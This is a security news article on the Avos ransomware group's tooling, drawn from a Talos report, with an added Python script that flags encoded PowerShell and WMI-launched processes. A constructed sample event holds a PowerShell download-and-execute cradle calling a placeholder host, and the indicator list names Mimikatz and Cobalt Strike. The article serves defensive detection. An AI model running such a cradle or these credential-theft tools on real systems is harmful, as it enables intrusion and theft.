The Avos ransomware threat actor has recently updated its tooling and now relies not only on custom malware but also on commercial and otherwise legitimate software.
A new report from Cisco Talos Intelligence Group exposes new tools used in Avos ransomware attacks.
Who is Avos?
Avos is a ransomware group active since July 2021. The group follows the ransomware-as-a-service (RaaS) business model, meaning it rents its ransomware and supporting infrastructure to affiliates who carry out the actual intrusions (Figure A).
AvosLocker currently supports Windows, Linux and ESXi environments and provides automatic, highly configurable builds of the AvosLocker malware. In addition, the threat actor provides affiliates with a control panel, a negotiation panel with push and sound notifications, decryption tests, and access to a network of penetration testers, initial access brokers and other contacts.
Avos also offers calling and DDoS services: operators phone victims to pressure them into paying the ransom, or launch DDoS attacks during the negotiation to add stress to the situation.
AvosLocker has already targeted critical infrastructure in the US, including financial services, manufacturing and government facilities, according to the FBI. The Avos team does not allow attacks against post-Soviet countries. A user nicknamed "Avos" has been observed on a Russian-language forum trying to recruit penetration testers with Active Directory experience as well as initial access brokers.
In late 2021, the group apologized for an attack on a U.S. police agency and provided an immediate, free decryptor for all the data that had been encrypted. An affiliate had carried out the attack, apparently without realizing the target was a law enforcement agency, so the Avos operators decided to hand the decryptor to the agency.
AvosLocker infections & tools
Spam email campaigns serve as the usual initial infection vector, giving the attackers a foothold in the target network before the ransomware is deployed.
Other methods are also used. Talos observed one case where initial access came through an internet-exposed ESXi server reached via VMware Horizon Unified Access Gateways (UAG) that were vulnerable to the Log4Shell vulnerability (CVE-2021-44228).
Once inside the compromised network, the attackers ran several malicious tools on endpoints. They also used LoLBins (living-off-the-land binaries), legitimate binaries already present on the operating system, such as the WMI Provider Host (wmiprvse.exe), which hosts WMI providers and is the parent process of anything launched through WMI.
Four weeks after the initial compromise, the threat actor ran an encoded PowerShell command that used DownloadString to fetch remote content. Over the following days, further PowerShell commands downloaded additional files and tools, including Mimikatz and Cobalt Strike beacons. The attackers also downloaded and ran SoftPerfect Network Scanner, a commercially available port scanner that Avos is known to use frequently. They then modified administrative settings on a local and a remote host to prepare for the lateral movement stage of the attack.
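The encoded PowerShell cradle, the WMI Provider Host parent and the tool downloads described above are all visible in process-creation telemetry. The following Python script is an added example of what a detection pass over such events looks like; it is not code from this article or from the Talos report. It decodes -EncodedCommand arguments (UTF-16LE wrapped in base64, the way powershell.exe expects them), flags PowerShell launched by wmiprvse.exe, and searches both the raw and decoded command line for download cradles and tool names. The sample events are constructed, the download host 198.51.100.10 is a hypothetical address from the documentation range, and the indicator lists are my own assumptions rather than indicators published by Talos.

```python
from __future__ import annotations

import base64
import binascii
import re
from typing import Optional

# Constructed sample process-creation events (Sysmon Event ID 1 style fields).
# They are NOT telemetry from the Talos report; the download host
# 198.51.100.10 is a hypothetical address from the documentation range.


def encode_ps(script: str) -> str:
    """Encode a script the way powershell.exe -EncodedCommand expects: UTF-16LE, then base64."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


SAMPLE_EVENTS = [
    # Encoded download cradle launched through WMI: the remote-execution pattern.
    {"ParentImage": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -nop -w hidden -enc "
                    + encode_ps("IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.10/a.ps1')")},
    # Benign admin script: must not be flagged.
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\backup.ps1"},
    # Unrelated service host: must not be flagged.
    {"ParentImage": r"C:\Windows\System32\services.exe",
     "Image": r"C:\Windows\System32\svchost.exe",
     "CommandLine": "svchost.exe -k netsvcs"},
]

# powershell.exe accepts any unambiguous prefix of -EncodedCommand; the
# abbreviations matched here are the commonly seen ones (assumption: extend
# the alternation if your telemetry shows others). The argument is base64 text.
ENC_FLAG = re.compile(r"(?:^|\s)-e(?:ncodedcommand|nc|n|c)?\s+([A-Za-z0-9+/=]+)", re.I)

# Download-cradle and tool-name indicators (my assumptions, not a published list),
# checked against the raw command line and the decoded script.
INDICATORS = [
    ("DownloadString cradle", re.compile(r"DownloadString", re.I)),
    ("Invoke-Expression / IEX", re.compile(r"\bIEX\b|Invoke-Expression", re.I)),
    ("file download", re.compile(r"DownloadFile|Invoke-WebRequest|\biwr\b", re.I)),
    ("offensive tool name", re.compile(r"mimikatz|sekurlsa|cobaltstrike|beacon", re.I)),
]


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the decoded script of a -EncodedCommand argument, or None if there is none."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        raw = base64.b64decode(m.group(1), validate=True)
    except binascii.Error:
        return None  # not valid base64; leave it for a human to look at
    return raw.decode("utf-16-le", errors="replace")


def analyze_event(event: dict) -> list[str]:
    """Return the findings for one process-creation event (empty list if nothing matched)."""
    findings: list[str] = []
    image = event["Image"].lower()
    parent = event["ParentImage"].lower()
    cmd = event["CommandLine"]

    # A PowerShell child of the WMI Provider Host is what remote WMI execution looks like.
    if image.endswith("powershell.exe") and parent.endswith("wmiprvse.exe"):
        findings.append("PowerShell spawned by WMI Provider Host (likely remote WMI execution)")

    decoded = decode_encoded_command(cmd)
    if decoded is not None:
        findings.append("encoded PowerShell command line")
        cmd = cmd + "\n" + decoded  # inspect the decoded script as well as the raw line

    for label, pattern in INDICATORS:
        if pattern.search(cmd):
            findings.append(label)
    return findings


def scan(events: list[dict]) -> dict[int, list[str]]:
    """Map event index -> findings for every event that produced at least one finding."""
    return {i: f for i, ev in enumerate(events) if (f := analyze_event(ev))}


if __name__ == "__main__":
    for idx, findings in scan(SAMPLE_EVENTS).items():
        print(f"event {idx}: " + "; ".join(findings))
```

Matching on the decoded script matters: the raw command line of the first event contains nothing but an opaque base64 blob, so a rule that only looks for "DownloadString" in the command line would miss it entirely, which is precisely why attackers use -EncodedCommand.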
Another copy of the port scanner was transferred over AnyDesk, a legitimate remote access tool, to a second server in the compromised network.
Once reconnaissance and lateral movement are complete, the attackers use PDQ Deploy, a legitimate software deployment tool, to push the ransomware and other tools to hosts across the target network.
Past Avos attacks have also involved other tools: the PuTTY Secure Copy client (pscp.exe), Rclone, Advanced IP Scanner and WinLister.
At the end of the process, victims are shown a ransom note (Figure B).
Avos victims who do not pay have their data sold, as stated on the Avos website: “All data is FOR SALE. Contact us with your offers. We only sell data to third parties if the owner of said data refuses to pay.”
How to protect yourself from Avos
Network segmentation should be implemented to reduce the risk of a single intrusion shutting down the whole organization. Strong backup policies, including copies kept offline or otherwise out of reach of an attacker and regularly tested for restoration, are needed to avoid losing data in a successful attack.
Multi-factor authentication should be required on every internet-facing service, especially VPN access and webmail. Accounts and services should be configured with the least privileges they need.
Antivirus and endpoint security solutions need to be deployed to detect the threat, with real-time protection always enabled. All systems and software must be kept up to date and patched so that known vulnerabilities, such as the Log4Shell flaw used for initial access in the case above, cannot be exploited.
Every employee should receive training and awareness sessions, especially on recognizing phishing emails and other social engineering tricks aimed at users.
Disclosure: I work for Trend Micro, but the views expressed in this article are mine.